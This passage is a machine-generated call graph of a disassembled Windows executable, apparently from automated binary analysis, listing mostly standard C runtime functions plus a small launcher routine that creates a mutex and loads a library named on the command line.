3954->3957 3958 fa23d7 3955->3958 3959 fa35ee ___free_lc_time 66 API calls 3955->3959 3956->3954 3957->3955 3960 fa23e8 3958->3960 3961 fa35ee ___free_lc_time 66 API calls 3958->3961 3959->3958 3962 fa2aa0 __lock 66 API calls 3960->3962 3961->3960 3963 fa23f0 3962->3963 3964 fa23fc InterlockedDecrement 3963->3964 3965 fa2415 3963->3965 3964->3965 3967 fa2407 3964->3967 3980 fa2479 3965->3980 3967->3965 3969 fa35ee ___free_lc_time 66 API calls 3967->3969 3969->3965 3970 fa2aa0 __lock 66 API calls 3971 fa2429 3970->3971 3972 fa245a 3971->3972 3983 fa3d2d 3971->3983 4027 fa2485 3972->4027 3976 fa35ee ___free_lc_time 66 API calls 3976->3977 4030 fa29c6 LeaveCriticalSection 3980->4030 3982 fa2422 3982->3970 3984 fa3d3e InterlockedDecrement 3983->3984 3985 fa243e 3983->3985 3986 fa3d53 InterlockedDecrement 3984->3986 3987 fa3d56 3984->3987 3985->3972 3997 fa3b55 3985->3997 3986->3987 3988 fa3d63 3987->3988 3989 fa3d60 InterlockedDecrement 3987->3989 3990 fa3d6d InterlockedDecrement 3988->3990 3991 fa3d70 3988->3991 3989->3988 3990->3991 3992 fa3d7a InterlockedDecrement 3991->3992 3994 fa3d7d 3991->3994 3992->3994 3993 fa3d96 InterlockedDecrement 3993->3994 3994->3993 3995 fa3da6 InterlockedDecrement 3994->3995 3996 fa3db1 InterlockedDecrement 3994->3996 3995->3994 3996->3985 3998 fa3b6c 3997->3998 3999 fa3bd9 3997->3999 3998->3999 4002 fa3ba0 3998->4002 4011 fa35ee ___free_lc_time 66 API calls 3998->4011 4000 fa3c26 3999->4000 4001 fa35ee ___free_lc_time 66 API calls 3999->4001 4008 fa3c4d 4000->4008 4055 fa5ae1 4000->4055 4004 fa3bfa 4001->4004 4006 fa3bc1 4002->4006 4014 fa35ee ___free_lc_time 66 API calls 4002->4014 4007 fa35ee ___free_lc_time 66 API calls 4004->4007 4009 fa35ee ___free_lc_time 66 API calls 4006->4009 4013 fa3c0d 4007->4013 4010 fa3c92 4008->4010 4021 fa35ee 66 API calls ___free_lc_time 4008->4021 4016 fa3bce 4009->4016 4017 fa35ee ___free_lc_time 66 API calls 4010->4017 4018 fa3b95 4011->4018 4012 fa35ee ___free_lc_time 66 API calls 4012->4008 4015 fa35ee ___free_lc_time 66 API calls 4013->4015 4019 fa3bb6 4014->4019 4020 fa3c1b 4015->4020 4022 fa35ee ___free_lc_time 66 API calls 4016->4022 4023 fa3c98 4017->4023 4031 fa5cbb 4018->4031 4047 fa5c76 4019->4047 4026 fa35ee ___free_lc_time 66 API calls 4020->4026 4021->4008 4022->3999 4023->3972 4026->4000 4143 fa29c6 LeaveCriticalSection 4027->4143 4029 fa2467 4029->3976 4030->3982 4032 fa5cc8 4031->4032 4046 fa5d45 4031->4046 4033 fa35ee ___free_lc_time 66 API calls 4032->4033 4034 fa5cd9 4032->4034 4033->4034 4035 fa35ee ___free_lc_time 66 API calls 4034->4035 4037 fa5ceb 4034->4037 4035->4037 4036 fa5cfd 4039 fa5d0f 4036->4039 4040 fa35ee ___free_lc_time 66 API calls 4036->4040 4037->4036 4038 fa35ee ___free_lc_time 66 API calls 4037->4038 4038->4036 4041 fa5d21 4039->4041 4043 fa35ee ___free_lc_time 66 API calls 4039->4043 4040->4039 4042 fa5d33 4041->4042 4044 fa35ee ___free_lc_time 66 API calls 4041->4044 4045 fa35ee ___free_lc_time 66 API calls 4042->4045 4042->4046 4043->4041 4044->4042 4045->4046 4046->4002 4048 fa5c83 4047->4048 4054 fa5cb7 4047->4054 4049 fa5c93 4048->4049 4050 fa35ee ___free_lc_time 66 API calls 4048->4050 4051 fa5ca5 4049->4051 4052 fa35ee ___free_lc_time 66 API calls 4049->4052 4050->4049 4053 fa35ee ___free_lc_time 66 API calls 4051->4053 4051->4054 4052->4051 4053->4054 4054->4006 4056 fa5af2 4055->4056 4057 fa3c46 4055->4057 4058 fa35ee ___free_lc_time 66 API calls 4056->4058 4057->4012 4059 fa5afa 4058->4059 4060 fa35ee ___free_lc_time 66 API calls 4059->4060 4061 fa5b02 4060->4061 4062 fa35ee ___free_lc_time 66 API calls 4061->4062 4063 fa5b0a 4062->4063 4064 fa35ee ___free_lc_time 66 API calls 4063->4064 4065 fa5b12 4064->4065 4066 fa35ee ___free_lc_time 66 API calls 4065->4066 4067 fa5b1a 4066->4067 4068 fa35ee ___free_lc_time 66 API calls 4067->4068 4069 fa5b22 4068->4069 4070 fa35ee ___free_lc_time 66 API calls 4069->4070 4071 fa5b29 4070->4071 4072 fa35ee ___free_lc_time 66 API calls 4071->4072 4073 fa5b31 4072->4073 4074 fa35ee ___free_lc_time 66 API calls 4073->4074 4075 fa5b39 4074->4075 4076 fa35ee ___free_lc_time 66 API calls 4075->4076 4077 fa5b41 4076->4077 4078 fa35ee ___free_lc_time 66 API calls 4077->4078 4079 fa5b49 4078->4079 4080 fa35ee ___free_lc_time 66 API calls 4079->4080 4081 fa5b51 4080->4081 4082 fa35ee ___free_lc_time 66 API calls 4081->4082 4083 fa5b59 4082->4083 4084 fa35ee ___free_lc_time 66 API calls 4083->4084 4085 fa5b61 4084->4085 4086 fa35ee ___free_lc_time 66 API calls 4085->4086 4087 fa5b69 4086->4087 4088 fa35ee ___free_lc_time 66 API calls 4087->4088 4089 fa5b71 4088->4089 4090 fa35ee ___free_lc_time 66 API calls 4089->4090 4091 fa5b7c 4090->4091 4092 fa35ee ___free_lc_time 66 API calls 4091->4092 4093 fa5b84 4092->4093 4094 fa35ee ___free_lc_time 66 API calls 4093->4094 4095 fa5b8c 4094->4095 4096 fa35ee ___free_lc_time 66 API calls 4095->4096 4097 fa5b94 4096->4097 4098 fa35ee ___free_lc_time 66 API calls 4097->4098 4099 fa5b9c 4098->4099 4100 fa35ee ___free_lc_time 66 API calls 4099->4100 4101 fa5ba4 4100->4101 4102 fa35ee ___free_lc_time 66 API calls 4101->4102 4103 fa5bac 4102->4103 4104 fa35ee ___free_lc_time 66 API calls 4103->4104 4105 fa5bb4 4104->4105 4106 fa35ee ___free_lc_time 66 API calls 4105->4106 4107 fa5bbc 4106->4107 4108 fa35ee ___free_lc_time 66 API calls 4107->4108 4109 fa5bc4 4108->4109 4110 fa35ee ___free_lc_time 66 API calls 4109->4110 4111 fa5bcc 4110->4111 4112 fa35ee ___free_lc_time 66 API calls 4111->4112 4113 fa5bd4 4112->4113 4114 fa35ee ___free_lc_time 66 API calls 4113->4114 4115 fa5bdc 4114->4115 4116 fa35ee ___free_lc_time 66 API calls 4115->4116 4117 fa5be4 4116->4117 4118 fa35ee ___free_lc_time 66 API calls 4117->4118 4119 fa5bec 4118->4119 4120 fa35ee ___free_lc_time 66 API calls 4119->4120 4121 fa5bf4 4120->4121 4122 fa35ee ___free_lc_time 66 API calls 4121->4122 4123 fa5c02 4122->4123 4124 fa35ee ___free_lc_time 66 API calls 4123->4124 4125 fa5c0d 4124->4125 4126 fa35ee ___free_lc_time 66 API calls 4125->4126 4127 fa5c18 4126->4127 4128 fa35ee ___free_lc_time 66 API calls 4127->4128 4129 fa5c23 4128->4129 4130 fa35ee ___free_lc_time 66 API calls 4129->4130 4131 fa5c2e 4130->4131 4132 fa35ee ___free_lc_time 66 API calls 4131->4132 4133 fa5c39 4132->4133 4134 fa35ee ___free_lc_time 66 API calls 4133->4134 4135 fa5c44 4134->4135 4136 fa35ee ___free_lc_time 66 API calls 4135->4136 4137 fa5c4f 4136->4137 4138 fa35ee ___free_lc_time 66 API calls 4137->4138 4139 fa5c5a 4138->4139 4140 fa35ee ___free_lc_time 66 API calls 4139->4140 4141 fa5c65 4140->4141 4142 fa35ee ___free_lc_time 66 API calls 4141->4142 4142->4057 4143->4029 4390 fa2d3f 4391 fa3730 __calloc_crt 66 API calls 4390->4391 4392 fa2d4b 4391->4392 4393 fa207e __encode_pointer 6 API calls 4392->4393 4394 fa2d53 4393->4394 4395 fa543d 4396 fa1411 __amsg_exit 66 API calls 4395->4396 4397 fa5444 4396->4397 4398 fa26b0 4399 fa26e9 4398->4399 4400 fa26dc 4398->4400 4402 fa10cc ___ansicp 5 API calls 4399->4402 4401 fa10cc ___ansicp 5 API calls 4400->4401 4401->4399 4411 fa26f9 __except_handler4 __IsNonwritableInCurrentImage 4402->4411 4403 fa277c 4404 fa2752 __except_handler4 4404->4403 4405 fa276c 4404->4405 4406 fa10cc ___ansicp 5 API calls 4404->4406 4407 fa10cc ___ansicp 5 API calls 4405->4407 4406->4405 4407->4403 4409 fa27cb __except_handler4 4410 fa27ff 4409->4410 4412 fa10cc ___ansicp 5 API calls 4409->4412 4413 fa10cc ___ansicp 5 API calls 4410->4413 4411->4403 4411->4404 4414 fa51ca RtlUnwind 4411->4414 4412->4410 4413->4404 4414->4409 4424 fa1391 4425 fa13cd 4424->4425 4426 fa13a3 4424->4426 4426->4425 4428 fa28da 4426->4428 4429 fa28e6 _doexit 4428->4429 4430 fa2345 __getptd 66 API calls 4429->4430 4431 fa28eb 4430->4431 4432 fa51fb _abort 68 API calls 4431->4432 4433 fa290d _doexit 4432->4433 4433->4425 4415 fa31b4 4416 fa31c0 SetLastError 4415->4416 4417 fa31c8 _doexit 4415->4417 4416->4417 4144 fa67c8 RtlUnwind 4418 fa122e 4421 fa18fe 4418->4421 4422 fa22cc __getptd_noexit 66 API calls 4421->4422 4423 fa123f 4422->4423 4434 fa458d 4437 fa29c6 LeaveCriticalSection 4434->4437 4436 fa4594 4437->4436 4145 fa1242 4146 fa1251 4145->4146 4147 fa1257 4145->4147 4148 fa1697 _raise 66 API calls 4146->4148 4151 fa16bc 4147->4151 4148->4147 4150 fa125c _doexit 4152 fa1555 _doexit 66 API calls 4151->4152 4153 fa16c7 4152->4153 4153->4150 4438 fa1281 4441 fa283c 4438->4441 4440 fa1286 4440->4440 4442 fa286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4441->4442 4443 fa2861 4441->4443 4444 fa2865 4442->4444 4443->4442 4443->4444 4444->4440 4154 fa4247 4164 fa41cb 4154->4164 4157 fa4272 setSBCS 4158 fa10cc ___ansicp 5 API calls 4157->4158 4159 fa442a 4158->4159 4160 fa42b6 IsValidCodePage 4160->4157 4161 fa42c8 GetCPInfo 4160->4161 4161->4157 4163 fa42db __setmbcp_nolock __crtGetStringTypeA_stat 4161->4163 4171 fa3f0d GetCPInfo 4163->4171 4181 fa4144 4164->4181 4167 fa41ea GetOEMCP 4169 fa41fa 4167->4169 4168 fa4208 4168->4169 4170 fa420d GetACP 4168->4170 4169->4157 4169->4160 4169->4163 4170->4169 4172 fa3f41 __crtGetStringTypeA_stat 4171->4172 4180 fa3ff3 4171->4180 4241 fa5fe2 4172->4241 4175 fa10cc ___ansicp 5 API calls 4177 fa409e 4175->4177 4177->4163 4179 fa6415 ___crtLCMapStringA 101 API calls 4179->4180 4180->4175 4182 fa41a4 4181->4182 4183 fa4157 4181->4183 4182->4167 4182->4168 4189 fa2345 4183->4189 4186 fa4184 4186->4182 4209 fa40a0 4186->4209 4190 fa22cc __getptd_noexit 66 API calls 4189->4190 4191 fa234d 4190->4191 4192 fa235a 4191->4192 4193 fa1411 __amsg_exit 66 API calls 4191->4193 4192->4186 4194 fa3e04 4192->4194 4193->4192 4195 fa3e10 _doexit 4194->4195 4196 fa2345 __getptd 66 API calls 4195->4196 4197 fa3e15 4196->4197 4198 fa3e43 4197->4198 4200 fa3e27 4197->4200 4199 fa2aa0 __lock 66 API calls 4198->4199 4201 fa3e4a 4199->4201 4202 fa2345 __getptd 66 API calls 4200->4202 4225 fa3dc6 4201->4225 4204 fa3e2c 4202->4204 4207 fa3e3a _doexit 4204->4207 4208 fa1411 __amsg_exit 66 API calls 4204->4208 4207->4186 4208->4207 4210 fa40ac _doexit 4209->4210 4211 fa2345 __getptd 66 API calls 4210->4211 4212 fa40b1 4211->4212 4213 fa2aa0 __lock 66 API calls 4212->4213 4216 fa40c3 4212->4216 4214 fa40e1 4213->4214 4215 fa412a 4214->4215 4218 fa40f8 InterlockedDecrement 4214->4218 4219 fa4112 InterlockedIncrement 4214->4219 4237 fa413b 4215->4237 4217 fa40d1 _doexit 4216->4217 4221 fa1411 __amsg_exit 66 API calls 4216->4221 4217->4182 4218->4219 4222 fa4103 4218->4222 4219->4215 4221->4217 4222->4219 4223 fa35ee ___free_lc_time 66 API calls 4222->4223 4224 fa4111 4223->4224 4224->4219 4226 fa3dca 4225->4226 4232 fa3dfc 4225->4232 4227 fa3c9e ___addlocaleref 8 API calls 4226->4227 4226->4232 4228 fa3ddd 4227->4228 4229 fa3d2d ___removelocaleref 8 API calls 4228->4229 4228->4232 4230 fa3de8 4229->4230 4231 fa3b55 ___freetlocinfo 66 API calls 4230->4231 4230->4232 4231->4232 4233 fa3e6e 4232->4233 4236 fa29c6 LeaveCriticalSection 4233->4236 4235 fa3e75 4235->4204 4236->4235 4240 fa29c6 LeaveCriticalSection 4237->4240 4239 fa4142 4239->4216 4240->4239 4242 fa4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4241->4242 4243 fa5ff5 4242->4243 4251 fa5e28 4243->4251 4246 fa6415 4247 fa4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4246->4247 4248 fa6428 4247->4248 4339 fa6070 4248->4339 4252 fa5e49 GetStringTypeW 4251->4252 4253 fa5e74 4251->4253 4254 fa5e69 GetLastError 4252->4254 4255 fa5e61 4252->4255 4253->4255 4256 fa5f5b 4253->4256 4254->4253 4257 fa5ead MultiByteToWideChar 4255->4257 4274 fa5f55 4255->4274 4279 fa6b1a GetLocaleInfoA 4256->4279 4263 fa5eda 4257->4263 4257->4274 4259 fa10cc ___ansicp 5 API calls 4261 fa3fae 4259->4261 4261->4246 4262 fa5fac GetStringTypeA 4267 fa5fc7 4262->4267 4262->4274 4264 fa54b5 _malloc 66 API calls 4263->4264 4268 fa5eef __alloca_probe_16 __crtGetStringTypeA_stat 4263->4268 4264->4268 4266 fa5f28 MultiByteToWideChar 4270 fa5f3e GetStringTypeW 4266->4270 4271 fa5f4f 4266->4271 4272 fa35ee ___free_lc_time 66 API calls 4267->4272 4268->4266 4268->4274 4270->4271 4275 fa5446 4271->4275 4272->4274 4274->4259 4276 fa5452 4275->4276 4277 fa5463 4275->4277 4276->4277 4278 fa35ee ___free_lc_time 66 API calls 4276->4278 4277->4274 4278->4277 4280 fa6b48 4279->4280 4281 fa6b4d 4279->4281 4283 fa10cc ___ansicp 5 API calls 4280->4283 4310 fa6b04 4281->4310 4284 fa5f7f 4283->4284 4284->4262 4284->4274 4285 fa6b63 4284->4285 4286 fa6ba3 GetCPInfo 4285->4286 4287 fa6c2d 4285->4287 4288 fa6bba 4286->4288 4289 fa6c18 MultiByteToWideChar 4286->4289 4291 fa10cc ___ansicp 5 API calls 4287->4291 4288->4289 4290 fa6bc0 GetCPInfo 4288->4290 4289->4287 4294 fa6bd3 _strlen 4289->4294 4290->4289 4292 fa6bcd 4290->4292 4293 fa5fa0 4291->4293 4292->4289 4292->4294 4293->4262 4293->4274 4295 fa54b5 _malloc 66 API calls 4294->4295 4297 fa6c05 __alloca_probe_16 __crtGetStringTypeA_stat 4294->4297 4295->4297 4296 fa6c62 MultiByteToWideChar 4298 fa6c7a 4296->4298 4299 fa6c99 4296->4299 4297->4287 4297->4296 4301 fa6c9e 4298->4301 4302 fa6c81 WideCharToMultiByte 4298->4302 4300 fa5446 __freea 66 API calls 4299->4300 4300->4287 4303 fa6ca9 WideCharToMultiByte 4301->4303 4304 fa6cbd 4301->4304 4302->4299 4303->4299 4303->4304 4305 fa3730 __calloc_crt 66 API calls 4304->4305 4306 fa6cc5 4305->4306 4306->4299 4307 fa6cce WideCharToMultiByte 4306->4307 4307->4299 4308 fa6ce0 4307->4308 4309 fa35ee ___free_lc_time 66 API calls 4308->4309 4309->4299 4313 fa6f7a 4310->4313 4314 fa6f93 4313->4314 4317 fa6d4b 4314->4317 4318 fa4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4317->4318 4321 fa6d60 4318->4321 4319 fa6d72 4320 fa2c72 _strcat_s 66 API calls 4319->4320 4322 fa6d77 4320->4322 4321->4319 4324 fa6daf 4321->4324 4323 fa2c0a _strcat_s 6 API calls 4322->4323 4328 fa6b15 4323->4328 4326 fa6df4 4324->4326 4329 fa69e5 4324->4329 4327 fa2c72 _strcat_s 66 API calls 4326->4327 4326->4328 4327->4328 4328->4280 4330 fa4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4329->4330 4331 fa69f9 4330->4331 4335 fa6a06 4331->4335 4336 fa6acc 4331->4336 4334 fa5fe2 ___crtGetStringTypeA 90 API calls 4334->4335 4335->4324 4337 fa4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4336->4337 4338 fa6a2e 4337->4338 4338->4334 4340 fa6091 LCMapStringW 4339->4340 4344 fa60ac 4339->4344 4341 fa60b4 GetLastError 4340->4341 4340->4344 4341->4344 4342 fa62aa 4345 fa6b1a ___ansicp 90 API calls 4342->4345 4343 fa6106 4346 fa611f MultiByteToWideChar 4343->4346 4369 fa62a1 4343->4369 4344->4342 4344->4343 4348 fa62d2 4345->4348 4353 fa614c 4346->4353 4346->4369 4347 fa10cc ___ansicp 5 API calls 4349 fa3fce 4347->4349 4350 fa62eb 4348->4350 4351 fa63c6 LCMapStringA 4348->4351 4348->4369 4349->4179 4355 fa6b63 ___convertcp 73 API calls 4350->4355 4354 fa6322 4351->4354 4352 fa619d MultiByteToWideChar 4356 fa6298 4352->4356 4357 fa61b6 LCMapStringW 4352->4357 4359 fa54b5 _malloc 66 API calls 4353->4359 4366 fa6165 __alloca_probe_16 4353->4366 4358 fa63ed 4354->4358 4362 fa35ee ___free_lc_time 66 API calls 4354->4362 4360 fa62fd 4355->4360 4364 fa5446 __freea 66 API calls 4356->4364 4357->4356 4361 fa61d7 4357->4361 4367 fa35ee ___free_lc_time 66 API calls 4358->4367 4358->4369 4359->4366 4363 fa6307 LCMapStringA 4360->4363 4360->4369 4365 fa61e0 4361->4365 4372 fa6209 4361->4372 4362->4358 4363->4354 4370 fa6329 4363->4370 4364->4369 4365->4356 4368 fa61f2 LCMapStringW 4365->4368 4366->4352 4366->4369 4367->4369 4368->4356 4369->4347 4373 fa633a __alloca_probe_16 __crtGetStringTypeA_stat 4370->4373 4374 fa54b5 _malloc 66 API calls 4370->4374 4371 fa6258 LCMapStringW 4375 fa6292 4371->4375 4376 fa6270 WideCharToMultiByte 4371->4376 4377 fa6224 __alloca_probe_16 4372->4377 4378 fa54b5 _malloc 66 API calls 4372->4378 4373->4354 4380 fa6378 LCMapStringA 4373->4380 4374->4373 4379 fa5446 __freea 66 API calls 4375->4379 4376->4375 4377->4356 4377->4371 4378->4377 4379->4356 4382 fa6398 4380->4382 4383 fa6394 4380->4383 4384 fa6b63 ___convertcp 73 API calls 4382->4384 4385 fa5446 __freea 66 API calls 4383->4385 4384->4383 4385->4354 3204 fa1104 3241 fa264c 3204->3241 3206 fa1110 GetStartupInfoW 3207 fa1133 3206->3207 3242 fa261b HeapCreate 3207->3242 3210 fa1183 3244 fa248e GetModuleHandleW 3210->3244 3214 fa1194 __RTC_Initialize 3278 fa1dde 3214->3278 3215 fa10db _fast_error_exit 66 API calls 3215->3214 3217 fa11ae GetCommandLineW 3293 fa1d81 GetEnvironmentStringsW 3217->3293 3218 fa11a2 3218->3217 3352 fa1411 3218->3352 3222 fa11bd 3302 fa1cd3 GetModuleFileNameW 3222->3302 3225 fa11d2 3308 fa1aa4 3225->3308 3226 fa1411 __amsg_exit 66 API calls 3226->3225 3229 fa11e3 3321 fa14d0 3229->3321 3230 fa1411 __amsg_exit 66 API calls 3230->3229 3232 fa11ea 3233 fa1411 __amsg_exit 66 API calls 3232->3233 3234 fa11f5 __wwincmdln 3232->3234 3233->3234 3327 fa1000 CoInitialize CreateMutexW 3234->3327 3236 fa1216 3237 fa1224 3236->3237 3341 fa1681 3236->3341 3359 fa16ad 3237->3359 3240 fa1229 _doexit 3241->3206 3243 fa1177 3242->3243 3243->3210 3344 fa10db 3243->3344 3245 fa24a9 3244->3245 3246 fa24a2 3244->3246 3248 fa24b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3245->3248 3249 fa2611 3245->3249 3362 fa13e1 3246->3362 3251 fa24fc TlsAlloc 3248->3251 3421 fa21a8 3249->3421 3254 fa1189 3251->3254 3255 fa254a TlsSetValue 3251->3255 3254->3214 3254->3215 3255->3254 3256 fa255b 3255->3256 3366 fa16cb 3256->3366 3261 fa207e __encode_pointer 6 API calls 3262 fa257b 3261->3262 3263 fa207e __encode_pointer 6 API calls 3262->3263 3264 fa258b 3263->3264 3265 fa207e __encode_pointer 6 API calls 3264->3265 3266 fa259b 3265->3266 3383 fa2924 3266->3383 3273 fa20f9 __decode_pointer 6 API calls 3274 fa25ef 3273->3274 3274->3249 3275 fa25f6 3274->3275 3403 fa21e5 3275->3403 3277 fa25fe GetCurrentThreadId 3277->3254 3748 fa264c 3278->3748 3280 fa1dea GetStartupInfoA 3281 fa3730 __calloc_crt 66 API calls 3280->3281 3288 fa1e0b 3281->3288 3282 fa2029 _doexit 3282->3218 3283 fa1fa6 GetStdHandle 3287 fa1f70 3283->3287 3284 fa200b SetHandleCount 3284->3282 3285 fa3730 __calloc_crt 66 API calls 3285->3288 3286 fa1fb8 GetFileType 3286->3287 3287->3282 3287->3283 3287->3284 3287->3286 3291 fa317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3287->3291 3288->3282 3288->3285 3288->3287 3290 fa1ef3 3288->3290 3289 fa1f1c GetFileType 3289->3290 3290->3282 3290->3287 3290->3289 3292 fa317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3290->3292 3291->3287 3292->3290 3294 fa1d92 3293->3294 3295 fa1d96 3293->3295 3294->3222 3297 fa36eb __malloc_crt 66 API calls 3295->3297 3298 fa1db7 3297->3298 3299 fa1dbe FreeEnvironmentStringsW 3298->3299 3749 fa37f0 3298->3749 3299->3222 3303 fa1d08 _wparse_cmdline 3302->3303 3304 fa11c7 3303->3304 3305 fa1d45 3303->3305 3304->3225 3304->3226 3306 fa36eb __malloc_crt 66 API calls 3305->3306 3307 fa1d4b _wparse_cmdline 3306->3307 3307->3304 3309 fa1abc _wcslen 3308->3309 3313 fa11d8 3308->3313 3310 fa3730 __calloc_crt 66 API calls 3309->3310 3316 fa1ae0 _wcslen 3310->3316 3311 fa1b45 3312 fa35ee ___free_lc_time 66 API calls 3311->3312 3312->3313 3313->3229 3313->3230 3314 fa3730 __calloc_crt 66 API calls 3314->3316 3315 fa1b6b 3317 fa35ee ___free_lc_time 66 API calls 3315->3317 3316->3311 3316->3313 3316->3314 3316->3315 3319 fa1b2a 3316->3319 3753 fa367c 3316->3753 3317->3313 3319->3316 3320 fa2ae2 __invoke_watson 10 API calls 3319->3320 3320->3319 3323 fa14de __IsNonwritableInCurrentImage 3321->3323 3762 fa2dc3 3323->3762 3324 fa14fc __initterm_e 3326 fa151b __IsNonwritableInCurrentImage __initterm 3324->3326 3766 fa2dac 3324->3766 3326->3232 3328 fa101f GetLastError 3327->3328 3329 fa1035 GetCommandLineW CommandLineToArgvW 3327->3329 3328->3329 3330 fa102c 3328->3330 3331 fa1067 3329->3331 3332 fa1056 PathFileExistsW 3329->3332 3330->3236 3334 fa1084 LoadLibraryW 3331->3334 3332->3331 3333 fa106e PathFileExistsW 3332->3333 3333->3331 3333->3334 3335 fa10aa CloseHandle CoUninitialize 3334->3335 3336 fa1091 GetProcAddress 3334->3336 3337 fa10bb LocalFree 3335->3337 3338 fa10c2 3335->3338 3339 fa10a3 FreeLibrary 3336->3339 3340 fa10a1 3336->3340 3337->3338 3338->3236 3339->3335 3340->3339 3867 fa1555 3341->3867 3343 fa1692 3343->3237 3345 fa10e9 3344->3345 3346 fa10ee 3344->3346 3347 fa18c4 __FF_MSGBANNER 66 API calls 3345->3347 3348 fa1719 __NMSG_WRITE 66 API calls 3346->3348 3347->3346 3349 fa10f6 3348->3349 3350 fa1465 _doexit 3 API calls 3349->3350 3351 fa1100 3350->3351 3351->3210 3353 fa18c4 __FF_MSGBANNER 66 API calls 3352->3353 3354 fa141b 3353->3354 3355 fa1719 __NMSG_WRITE 66 API calls 3354->3355 3356 fa1423 3355->3356 3357 fa20f9 __decode_pointer 6 API calls 3356->3357 3358 fa11ad 3357->3358 3358->3217 3360 fa1555 _doexit 66 API calls 3359->3360 3361 fa16b8 3360->3361 3361->3240 3363 fa13ec Sleep GetModuleHandleW 3362->3363 3364 fa140a 3363->3364 3365 fa140e 3363->3365 3364->3363 3364->3365 3365->3245 3432 fa20f0 3366->3432 3368 fa16d3 __init_pointers __initp_misc_winsig 3435 fa2913 3368->3435 3371 fa207e __encode_pointer 6 API calls 3372 fa170f 3371->3372 3373 fa207e TlsGetValue 3372->3373 3374 fa2096 3373->3374 3375 fa20b7 GetModuleHandleW 3373->3375 3374->3375 3378 fa20a0 TlsGetValue 3374->3378 3376 fa20d2 GetProcAddress 3375->3376 3377 fa20c7 3375->3377 3382 fa20af 3376->3382 3379 fa13e1 __crt_waiting_on_module_handle 2 API calls 3377->3379 3381 fa20ab 3378->3381 3380 fa20cd 3379->3380 3380->3376 3380->3382 3381->3375 3381->3382 3382->3261 3385 fa292f 3383->3385 3386 fa25a8 3385->3386 3438 fa317c 3385->3438 3386->3249 3387 fa20f9 TlsGetValue 3386->3387 3388 fa2132 GetModuleHandleW 3387->3388 3389 fa2111 3387->3389 3391 fa214d GetProcAddress 3388->3391 3392 fa2142 3388->3392 3389->3388 3390 fa211b TlsGetValue 3389->3390 3395 fa2126 3390->3395 3394 fa212a 3391->3394 3393 fa13e1 __crt_waiting_on_module_handle 2 API calls 3392->3393 3396 fa2148 3393->3396 3394->3249 3397 fa3730 3394->3397 3395->3388 3395->3394 3396->3391 3396->3394 3399 fa3739 3397->3399 3400 fa25d5 3399->3400 3401 fa3757 Sleep 3399->3401 3443 fa557f 3399->3443 3400->3249 3400->3273 3402 fa376c 3401->3402 3402->3399 3402->3400 3727 fa264c 3403->3727 3405 fa21f1 GetModuleHandleW 3406 fa2207 3405->3406 3407 fa2201 3405->3407 3409 fa221f GetProcAddress GetProcAddress 3406->3409 3410 fa2243 3406->3410 3408 fa13e1 __crt_waiting_on_module_handle 2 API calls 3407->3408 3408->3406 3409->3410 3411 fa2aa0 __lock 62 API calls 3410->3411 3412 fa2262 InterlockedIncrement 3411->3412 3728 fa22ba 3412->3728 3415 fa2aa0 __lock 62 API calls 3416 fa2283 3415->3416 3731 fa3c9e InterlockedIncrement 3416->3731 3418 fa22a1 3743 fa22c3 3418->3743 3420 fa22ae _doexit 3420->3277 3422 fa21be 3421->3422 3423 fa21b2 3421->3423 3425 fa21d2 TlsFree 3422->3425 3426 fa21e0 3422->3426 3424 fa20f9 __decode_pointer 6 API calls 3423->3424 3424->3422 3425->3426 3427 fa298b DeleteCriticalSection 3426->3427 3428 fa29a3 3426->3428 3429 fa35ee ___free_lc_time 66 API calls 3427->3429 3430 fa29b5 DeleteCriticalSection 3428->3430 3431 fa29c3 3428->3431 3429->3426 3430->3428 3431->3254 3433 fa207e __encode_pointer 6 API calls 3432->3433 3434 fa20f7 3433->3434 3434->3368 3436 fa207e __encode_pointer 6 API calls 3435->3436 3437 fa1705 3436->3437 3437->3371 3442 fa264c 3438->3442 3440 fa3188 InitializeCriticalSectionAndSpinCount 3441 fa31cc _doexit 3440->3441 3441->3385 3442->3440 3444 fa558b _doexit 3443->3444 3445 fa55a3 3444->3445 3453 fa55c2 __crtGetStringTypeA_stat 3444->3453 3456 fa2c72 3445->3456 3449 fa5634 HeapAlloc 3449->3453 3452 fa55b8 _doexit 3452->3399 3453->3449 3453->3452 3462 fa2aa0 3453->3462 3469 fa4dc3 3453->3469 3475 fa567b 3453->3475 3478 fa31eb 3453->3478 3481 fa22cc GetLastError 3456->3481 3458 fa2c77 3459 fa2c0a 3458->3459 3460 fa20f9 __decode_pointer 6 API calls 3459->3460 3461 fa2c1a __invoke_watson 3460->3461 3463 fa2ac8 EnterCriticalSection 3462->3463 3464 fa2ab5 3462->3464 3463->3453 3523 fa29dd 3464->3523 3466 fa2abb 3466->3463 3467 fa1411 __amsg_exit 65 API calls 3466->3467 3468 fa2ac7 3467->3468 3468->3463 3470 fa4df1 3469->3470 3471 fa4e8a 3470->3471 3474 fa4e93 3470->3474 3715 fa492a 3470->3715 3471->3474 3722 fa49da 3471->3722 3474->3453 3726 fa29c6 LeaveCriticalSection 3475->3726 3477 fa5682 3477->3453 3479 fa20f9 __decode_pointer 6 API calls 3478->3479 3480 fa31fb 3479->3480 3480->3453 3495 fa2174 TlsGetValue 3481->3495 3484 fa2339 SetLastError 3484->3458 3485 fa3730 __calloc_crt 63 API calls 3486 fa22f7 3485->3486 3486->3484 3487 fa20f9 __decode_pointer 6 API calls 3486->3487 3488 fa2311 3487->3488 3489 fa2318 3488->3489 3490 fa2330 3488->3490 3491 fa21e5 __mtinit 63 API calls 3489->3491 3500 fa35ee 3490->3500 3493 fa2320 GetCurrentThreadId 3491->3493 3493->3484 3494 fa2336 3494->3484 3496 fa2189 3495->3496 3497 fa21a4 3495->3497 3498 fa20f9 __decode_pointer 6 API calls 3496->3498 3497->3484 3497->3485 3499 fa2194 TlsSetValue 3498->3499 3499->3497 3502 fa35fa _doexit 3500->3502 3501 fa3673 _doexit _realloc 3501->3494 3502->3501 3504 fa2aa0 __lock 64 API calls 3502->3504 3512 fa3639 3502->3512 3503 fa364e HeapFree 3503->3501 3505 fa3660 3503->3505 3509 fa3611 ___sbh_find_block 3504->3509 3506 fa2c72 _strcat_s 64 API calls 